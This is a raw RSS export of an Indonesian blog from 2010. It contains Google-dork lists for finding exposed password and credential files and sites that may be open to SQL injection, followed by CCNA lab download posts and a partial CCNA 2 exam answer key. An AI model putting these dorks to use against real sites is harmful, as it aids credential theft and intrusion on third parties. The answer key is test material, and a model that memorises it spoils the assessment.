sites.ini modified&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:lilo.conf filetype:conf |LILO passwords&lt;br /&gt;
password -tatercounter2000&lt;br /&gt;
-bootpwd –man&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:config config intext: |Microsoft .NET application credentials&lt;br /&gt;
appSettings “User ID”&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:pwd service |Microsoft FrontPage Service Web passwords&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:index.of |Microsoft FrontPage Web credentials&lt;br /&gt;
administrators.pwd&lt;br /&gt;
———————————————————&lt;br /&gt;
“# -FrontPage-” |Microsoft FrontPage Web passwords&lt;br /&gt;
inurl:service.pwd&lt;br /&gt;
ext:pwd inurl:_vti_pvt inurl: |Microsoft FrontPage Web passwords&lt;br /&gt;
(Service | authors | administrators)&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:perform filetype:ini |mIRC nickserv credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:”index of” intext: |mySQL database credentials&lt;br /&gt;
connect.inc&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:”index of” intext: |mySQL database credentials&lt;br /&gt;
globals.inc&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:conf oekakibbs |Oekakibss user passwords&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:dat wand.dat |Opera‚ ÄúMagic Wand‚Äù Web credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:ospfd.conf intext: |OSPF Daemon Passwords&lt;br /&gt;
password -sample -test&lt;br /&gt;
-tutorial –download&lt;br /&gt;
———————————————————&lt;br /&gt;
index.of passlist |Passlist user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:passlist.txt |passlist.txt file user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:dat “password.dat” |password.dat files&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:password.log filetype:log |password.log file reveals usernames,&lt;br /&gt;
|passwords,and hostnames&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:log inurl:”password.log” |password.log files cleartext&lt;br /&gt;
|passwords&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:people.lst filetype:lst |People.lst generic password file&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:index.of config.php |PHP Configuration File database&lt;br /&gt;
|credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:config.php dbuname dbpass |PHP Configuration File database&lt;br /&gt;
|credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:nuke filetype:sql |PHP-Nuke credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:conf inurl:psybnc.conf |psyBNC IRC user credentials&lt;br /&gt;
“USER.PASS=”&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:ini ServUDaemon |servU FTP Daemon credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:conf slapd.conf |slapd configuration files root password&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:”slapd.conf” intext: |slapd LDAP credentials&lt;br /&gt;
”credentials” -manpage&lt;br /&gt;
-”Manual Page” -man: -sample&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:”slapd.conf” intext: |slapd LDAP root password&lt;br /&gt;
”rootpw” -manpage&lt;br /&gt;
-”Manual Page” -man: -sample&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:sql “IDENTIFIED BY” –cvs |SQL passwords&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:sql password |SQL passwords&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:ini wcx_ftp |Total Commander FTP passwords&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:netrc password |UNIX .netrc user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
index.of.etc |UNIX /etc directories contain&lt;br /&gt;
|various credential files&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:”Index of..etc” passwd |UNIX /etc/passwd user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:index.of passwd |UNIX /etc/passwd user credentials&lt;br /&gt;
passwd.bak&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:”Index of” pwd.db |UNIX /etc/pwd.db credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:Index.of etc shadow |UNIX /etc/shadow user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:index.of master.passwd |UNIX master.passwd user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
intitle:”Index of” spwd.db |UNIX spwd.db credentials&lt;br /&gt;
passwd -pam.conf&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:bak inurl:”htaccess| |UNIX various password file backups&lt;br /&gt;
passwd|shadow|htusers&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:inc dbconn |Various database credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:inc intext:mysql_ |Various database credentials, server names&lt;br /&gt;
connect&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:properties inurl:db |Various database credentials, server names&lt;br /&gt;
intext:password&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:vtund.conf intext:pass –cvs |Virtual Tunnel Daemon passwords&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:”wvdial.conf” intext: |wdial dialup user credentials&lt;br /&gt;
”password”&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:mdb wwforum |Web Wiz Forums Web credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
“AutoCreate=TRUE password=*” |Website Access Analyzer user passwords&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:pwl pwl |Windows Password List user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:reg reg +intext: |Windows Registry Keys containing user&lt;br /&gt;
”defaultusername” intext: |credentials&lt;br /&gt;
”defaultpassword”&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:reg reg +intext: |Windows Registry Keys containing user&lt;br /&gt;
”internet account manager” |credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
“index of/” “ws_ftp.ini” |WS_FTP FTP credentials&lt;br /&gt;
“parent directory”&lt;br /&gt;
———————————————————&lt;br /&gt;
filetype:ini ws_ftp pwd |WS_FTP FTP user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
inurl:/wwwboard |wwwboard user credentials&lt;br /&gt;
———————————————————&lt;br /&gt;
&lt;br /&gt;
mungkin temen2 ada yang ingin melihat password dari website jerman?&lt;br /&gt;
mungkin sebaiknya kita juga mengganti kata “password” dengan memakai bahasa jerman tentunya dibawah ini adalah tabel 5 negara beserta terjemahan password dalam bahasa masing2 negara.&lt;br /&gt;
&lt;br /&gt;
—————————————————–&lt;br /&gt;
BAHASA |KATA-KATA| TRANSLATE&lt;br /&gt;
—————————————————–&lt;br /&gt;
German |password | Kennwort&lt;br /&gt;
Spanish |password | contraseña&lt;br /&gt;
French |password | mot de passe&lt;br /&gt;
Italian |password | parola d’accesso&lt;br /&gt;
Portuguese |password | senha&lt;br /&gt;
Dutch |password | Paswoord&lt;br /&gt;
—————————————————–&lt;/blockquote&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;admin www.indowebster.com&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-5966740755713474474?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-07T14:48:23.420+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Dork SQL Injection</title><link>http://vanzuearticles.blogspot.com/2010/04/dork-sql-injection.html</link><category>SQL INJECTION</category><author>vanzue@gmail.com</author><pubDate>Wed, 07 Apr 2010 00:44:43 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-4464420161127554654</guid><description>&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;div style="text-align: center;"&gt;### Dork SQL Injection ###&lt;/div&gt;&lt;br /&gt;
inurl:index.php?id=&lt;br /&gt;
inurl:trainers.php?id=&lt;br /&gt;
inurl:buy.php?category=&lt;br /&gt;
inurl:article.php?ID=&lt;br /&gt;
inurl:play_old.php?id=&lt;br /&gt;
inurl:declaration_more.php?decl_id=&lt;br /&gt;
inurl:pageid=&lt;br /&gt;
inurl:games.php?id=&lt;br /&gt;
inurl:page.php?file=&lt;br /&gt;
inurl:newsDetail.php?id=&lt;br /&gt;
inurl:gallery.php?id=&lt;br /&gt;
inurl:article.php?id=&lt;br /&gt;
inurl:show.php?id=&lt;br /&gt;
inurl:staff_id=&lt;br /&gt;
inurl:newsitem.php?num=&lt;br /&gt;
inurl:readnews.php?id=&lt;br /&gt;
inurl:top10.php?cat=&lt;br /&gt;
inurl:historialeer.php?num=&lt;br /&gt;
inurl:reagir.php?num=&lt;br /&gt;
inurl:Stray-Questions-View.php?num=&lt;br /&gt;
inurl:forum_bds.php?num=&lt;br /&gt;
inurl:game.php?id=&lt;br /&gt;
inurl:view_product.php?id=&lt;br /&gt;
inurl:newsone.php?id=&lt;br /&gt;
inurl:sw_comment.php?id=&lt;br /&gt;
inurl:news.php?id=&lt;br /&gt;
inurl:avd_start.php?avd=&lt;br /&gt;
inurl:event.php?id=&lt;br /&gt;
inurl:product-item.php?id=&lt;br /&gt;
inurl:sql.php?id=&lt;br /&gt;
inurl:news_view.php?id=&lt;br /&gt;
inurl:select_biblio.php?id=&lt;br /&gt;
inurl:humor.php?id=&lt;br /&gt;
inurl:aboutbook.php?id=&lt;br /&gt;
inurl:ogl_inet.php?ogl_id=&lt;br /&gt;
inurl:fiche_spectacle.php?id=&lt;br /&gt;
inurl:communique_detail.php?id=&lt;br /&gt;
inurl:sem.php3?id=&lt;br /&gt;
inurl:kategorie.php4?id=&lt;br /&gt;
inurl:news.php?id=&lt;br /&gt;
inurl:index.php?id=&lt;br /&gt;
inurl:faq2.php?id=&lt;br /&gt;
inurl:show_an.php?id=&lt;br /&gt;
inurl:preview.php?id=&lt;br /&gt;
inurl:loadpsb.php?id=&lt;br /&gt;
inurl:opinions.php?id=&lt;br /&gt;
inurl:spr.php?id=&lt;br /&gt;
inurl:pages.php?id=&lt;br /&gt;
inurl:announce.php?id=&lt;br /&gt;
inurl:clanek.php4?id=&lt;br /&gt;
inurl:participant.php?id=&lt;br /&gt;
inurl:download.php?id=&lt;br /&gt;
inurl:main.php?id=&lt;br /&gt;
inurl:review.php?id=&lt;br /&gt;
inurl:chappies.php?id=&lt;br /&gt;
inurl:read.php?id=&lt;br /&gt;
inurl:prod_detail.php?id=&lt;br /&gt;
inurl:viewphoto.php?id=&lt;br /&gt;
inurl:article.php?id=&lt;br /&gt;
inurl:person.php?id=&lt;br /&gt;
inurl:productinfo.php?id=&lt;br /&gt;
inurl:showimg.php?id=&lt;br /&gt;
inurl:view.php?id=&lt;br /&gt;
inurl:website.php?id=&lt;br /&gt;
inurl:hosting_info.php?id=&lt;br /&gt;
inurl:gallery.php?id=&lt;br /&gt;
inurl:rub.php?idr=&lt;br /&gt;
inurl:view_faq.php?id=&lt;br /&gt;
inurl:artikelinfo.php?id=&lt;br /&gt;
inurl:detail.php?ID=&lt;br /&gt;
inurl:index.php?=&lt;br /&gt;
inurl:profile_view.php?id=&lt;br /&gt;
inurl:category.php?id=&lt;br /&gt;
inurl:publications.php?id=&lt;br /&gt;
inurl:fellows.php?id=&lt;br /&gt;
inurl:downloads_info.php?id=&lt;br /&gt;
inurl:prod_info.php?id=&lt;br /&gt;
inurl:shop.php?do=part&amp;amp;id=&lt;br /&gt;
inurl:productinfo.php?id=&lt;br /&gt;
inurl:collectionitem.php?id=&lt;br /&gt;
inurl:band_info.php?id=&lt;br /&gt;
inurl:product.php?id=&lt;br /&gt;
inurl:releases.php?id=&lt;br /&gt;
inurl:ray.php?id=&lt;br /&gt;
inurl:produit.php?id=&lt;br /&gt;
inurl:pop.php?id=&lt;br /&gt;
inurl:shopping.php?id=&lt;br /&gt;
inurl:productdetail.php?id=&lt;br /&gt;
inurl:post.php?id=&lt;br /&gt;
inurl:viewshowdetail.php?id=&lt;br /&gt;
inurl:clubpage.php?id=&lt;br /&gt;
inurl:memberInfo.php?id=&lt;br /&gt;
inurl:section.php?id=&lt;br /&gt;
inurl:theme.php?id=&lt;br /&gt;
inurl:page.php?id=&lt;br /&gt;
inurl:shredder-categories.php?id=&lt;br /&gt;
inurl:tradeCategory.php?id=&lt;br /&gt;
inurl:product_ranges_view.php?ID=&lt;br /&gt;
inurl:shop_category.php?id=&lt;br /&gt;
inurl:transcript.php?id=&lt;br /&gt;
inurl:channel_id=&lt;br /&gt;
inurl:item_id=&lt;br /&gt;
inurl:newsid=&lt;br /&gt;
inurl:trainers.php?id=&lt;br /&gt;
inurl:news-full.php?id=&lt;br /&gt;
inurl:news_display.php?getid=&lt;br /&gt;
inurl:index2.php?option=&lt;br /&gt;
inurl:readnews.php?id=&lt;br /&gt;
inurl:top10.php?cat=&lt;br /&gt;
inurl:newsone.php?id=&lt;br /&gt;
inurl:event.php?id=&lt;br /&gt;
inurl:product-item.php?id=&lt;br /&gt;
inurl:sql.php?id=&lt;br /&gt;
inurl:aboutbook.php?id=&lt;br /&gt;
inurl:preview.php?id=&lt;br /&gt;
inurl:loadpsb.php?id=&lt;br /&gt;
inurl:pages.php?id=&lt;br /&gt;
inurl:material.php?id=&lt;br /&gt;
inurl:clanek.php4?id=&lt;br /&gt;
inurl:announce.php?id=&lt;br /&gt;
inurl:chappies.php?id=&lt;br /&gt;
inurl:read.php?id=&lt;br /&gt;
inurl:viewapp.php?id=&lt;br /&gt;
inurl:viewphoto.php?id=&lt;br /&gt;
inurl:rub.php?idr=&lt;br /&gt;
inurl:galeri_info.php?l=&lt;br /&gt;
inurl:review.php?id=&lt;br /&gt;
inurl:iniziativa.php?in=&lt;br /&gt;
inurl:curriculum.php?id=&lt;br /&gt;
inurl:labels.php?id=&lt;br /&gt;
inurl:story.php?id=&lt;br /&gt;
inurl:look.php?ID=&lt;br /&gt;
inurl:newsone.php?id=&lt;br /&gt;
inurl:aboutbook.php?id=&lt;br /&gt;
inurl:material.php?id=&lt;br /&gt;
inurl:opinions.php?id=&lt;br /&gt;
inurl:announce.php?id=&lt;br /&gt;
inurl:rub.php?idr=&lt;br /&gt;
inurl:galeri_info.php?l=&lt;br /&gt;
inurl:tekst.php?idt=&lt;br /&gt;
inurl:newscat.php?id=&lt;br /&gt;
inurl:newsticker_info.php?idn=&lt;br /&gt;
inurl:rubrika.php?idr=&lt;br /&gt;
inurl:rubp.php?idr=&lt;br /&gt;
inurl:offer.php?idf=&lt;br /&gt;
inurl:art.php?idm=&lt;br /&gt;
inurl:title.php?id=&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;by : K-security&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-4464420161127554654?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-07T14:44:43.887+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Packet Tracer Skills Intregation Challenge Activity CCNA 2</title><link>http://vanzuearticles.blogspot.com/2010/04/packet-tracer-skills-intregation.html</link><category>CCNA 2 Module</category><category>Download CCNA 2 Module - with file (.pka)</category><author>vanzue@gmail.com</author><pubDate>Tue, 06 Apr 2010 09:15:20 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-8015779462445638068</guid><description>&lt;span class="fullpost"&gt;The Packet Tracer Skills Integration Challenge Activity for this chapter is very similar to the activity you completed at the end of Chapter 9. The scenario is slightly different, allowing you to better practice your skills.&amp;nbsp; &lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_JYCZNSWdoTU/S7tdgume2PI/AAAAAAAAASY/K3_83eVuqrI/s1600/CH10.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_JYCZNSWdoTU/S7tdgume2PI/AAAAAAAAASY/K3_83eVuqrI/s320/CH10.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Download this file :&amp;nbsp;&lt;a href="http://www.ziddu.com/download/9329417/PacketTracerSkillsIntregationChallengeActivity.rar.html"&gt;Packet Tracer Skills Intregation Challenge Activity&lt;/a&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-8015779462445638068?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-06T23:15:20.785+07:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/_JYCZNSWdoTU/S7tdgume2PI/AAAAAAAAASY/K3_83eVuqrI/s72-c/CH10.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Download Modul The Show IP route Challenge Lab - Chapter 8 CCNA2</title><link>http://vanzuearticles.blogspot.com/2010/03/download-modul-show-ip-route-challenge.html</link><category>CCNA 2 Module</category><category>Download CCNA 2 Module - with file (.pka)</category><author>vanzue@gmail.com</author><pubDate>Sun, 21 Mar 2010 07:57:59 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-4381876928490134637</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_JYCZNSWdoTU/S6YxPam-2JI/AAAAAAAAASQ/pFlJMGBSXJE/s1600-h/The+show+IP+route+Lab.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_JYCZNSWdoTU/S6YxPam-2JI/AAAAAAAAASQ/pFlJMGBSXJE/s320/The+show+IP+route+Lab.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;In this lab activity, you will determine the topology of a network using the outputs from the show ip route command.&lt;br /&gt;
&lt;br /&gt;
You must draw a topology diagram and determine the interface addressing on each router. Next, you must build and configure the network based on the outputs. The DTE and DCE assignment is at your discretion. When complete, the outputs from your network must match those given below.&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #666666; font-family: arial; font-size: 12px; line-height: 19px;"&gt;&lt;a href="http://www.ziddu.com/download/9087237/Chapter8-showiproutechallengelab.rar.html" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3259d8; font-family: arial; font-size: 1em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline; white-space: normal;"&gt;Link Download File ( Download Modul The Show IP route Challenge Lab.pka )&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-4381876928490134637?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-21T21:57:59.033+07:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/_JYCZNSWdoTU/S6YxPam-2JI/AAAAAAAAASQ/pFlJMGBSXJE/s72-c/The+show+IP+route+Lab.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Download Modul Challenge RIPv2 Configuration - Chapter 7 CCNA2</title><link>http://vanzuearticles.blogspot.com/2010/03/download-modul-challenge-ripv2.html</link><category>CCNA 2 Module</category><category>Download CCNA 2 Module - with file (.pka)</category><author>vanzue@gmail.com</author><pubDate>Sun, 21 Mar 2010 07:58:18 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-6830082979727516389</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_JYCZNSWdoTU/S6YuO-3UThI/AAAAAAAAASI/oddawVJAH8k/s1600-h/752+2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_JYCZNSWdoTU/S6YuO-3UThI/AAAAAAAAASI/oddawVJAH8k/s320/752+2.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_JYCZNSWdoTU/S6Yt2Shi5nI/AAAAAAAAASA/ac4-M45bbx0/s1600-h/752.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_JYCZNSWdoTU/S6Yt2Shi5nI/AAAAAAAAASA/ac4-M45bbx0/s320/752.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;Use the Packet Tracer Activity to repeat a simulation of Lab 7.5.2. Remember, however, that Packet Tracer is not a substitute for a hands-on lab experience with real equipment.&lt;br /&gt;
&lt;br /&gt;
A summary of the instructions is provided within the activity. Use the Lab PDF for more details.&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #666666; font-family: arial; font-size: 12px; line-height: 19px;"&gt;&lt;a href="http://www.ziddu.com/download/9087118/RIPv2ChallengeConfigurationLab.rar.html"&gt;Link Download File ( Download Modul Challenge RIPv2 Configuration.pka )&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-6830082979727516389?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-21T21:58:18.101+07:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/_JYCZNSWdoTU/S6YuO-3UThI/AAAAAAAAASI/oddawVJAH8k/s72-c/752+2.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CCNA 2 Take Assessment Chapter 11 - 97%</title><link>http://vanzuearticles.blogspot.com/2010/03/ccna-2-take-assessment-chapter-11-97.html</link><category>CCNA 2 Take Assessment</category><author>vanzue@gmail.com</author><pubDate>Sun, 28 Mar 2010 22:47:48 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-590565309029353772</guid><description>&lt;div style="text-align: auto;"&gt;&lt;span class="Apple-style-span" style="color: #202020; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;"&gt;1. Refer to the exhibit. What configuration statements would give the results that are shown in the output of the show ip protocols command?&lt;/span&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="color: #202020; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;"&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;B(config)# router ospf 1&lt;br /&gt;
B(config-router)# router-id 192.168.1.5&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
2. Refer to the exhibit. All routers have been configured with the interface priorities that are shown. All routers were restarted simultaneously. The results of the DR/BDR election are shown. What can be concluded about this network?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;The highest router ID was most likely determined via an OSPF router-id statement or statements.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
3. Refer to the exhibit. When OSPF is operational in the exhibited network, what neighbor relationship is developed between Router1 and Router2?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;A FULL adjacency is formed.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
4. What range of networks will be advertised in the OSPF updates by the command Router1(config-router)# network 192.168.0.0 0.0.15.255 area 100?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;192.168.0.0/24 through 192.168.15.0/24&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
5. What does OSPF use to calculate the cost to a destination network?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;bandwidth&lt;/span&gt;&lt;br /&gt;
&lt;a href="" name="entrymore" style="color: #2255aa; text-decoration: none;"&gt;&lt;/a&gt;&lt;br /&gt;
6. Refer to the exhibit. The network administrator wants to set the router ID of Router1 to 192.168.100.1. What steps can the administrator take to accomplish this?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;nothing, the router-id of Router1 is already 192.168.100.1&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
7. Refer to the exhibit. Assuming that the routers have default interface OSPF priorities and no configured loopback interfaces, what two roles will router B play on each network segment? (Choose two.)&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;DR for network 192.168.1.200&lt;br /&gt;
BDR for network 192.168.1.204&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
8. What does OSPF use to reduce the number of exchanges of routing information in networks where large numbers of neighbors are present? (Choose two.)&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;designated router&lt;br /&gt;
backup designated router&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
9. Refer to the exhibit. Router1 and Router2 are running OSPF. The show ip ospf neighbor command reveals no neighbors. What is a possible cause?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;OSPF hello or dead timers do not match.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
10. Refer to the exhibit. Router A is correctly configured for OSPF. Which OSPF configuration statement or set of statements was entered for router B to generate the exhibited routing table?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;B(config-router)# network 192.168.1.0 0.0.0.3 area 0&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
11. Refer to the exhibit. The routers in the exhibit are using default OSPF configuration settings to advertise all attached networks. If all of the routers start at the same time, what will be the result of the DR and BDR elections for this single area OSPF network? (Choose three.)&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;Router A will be DR for 10.4.0.0/16.&lt;br /&gt;
HQ will be BDR for 10.4.0.0/16.&lt;br /&gt;
Remote will be DR for 10.5.0.0/16.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
12. Refer to the exhibit. How many OSPF adjacencies must be formed to build the complete topology if a DR or BDR were not elected in this OSPF network?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;6&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
13. Refer to the exhibit. What does the "2" stand for in the router ospf 2 statement?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;The number 2 identifies this particular instance of OSPF on this router.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
14. A fully converged five router OSPF network has been running successfully for several weeks. All configurations have been saved and no static routes are used. If one router looses power and reboots, what information will be in its routing table after the configuration file is loaded but before OSPF has converged?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;Directly connected networks that are operational will be in the routing table.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
15. Refer to the exhibit. RouterA, RouterB, and RouterC in the diagram are running OSPF on their Ethernet interfaces. Router D was just added to the network. Routers are configured with the loopback interfaces (Lo 0) that are shown in the exhibit. What happens to the OSPF DR/BDR after RouterD is added to the network?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;There is no change in the DR or BDR until either current DR or BDR goes down.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
16. Refer to the exhibit. Which network command or set of commands will cause OSPF to be enabled to send and receive packets for any R1 interface in the exhibited subnets?&lt;br /&gt;
&lt;br /&gt;
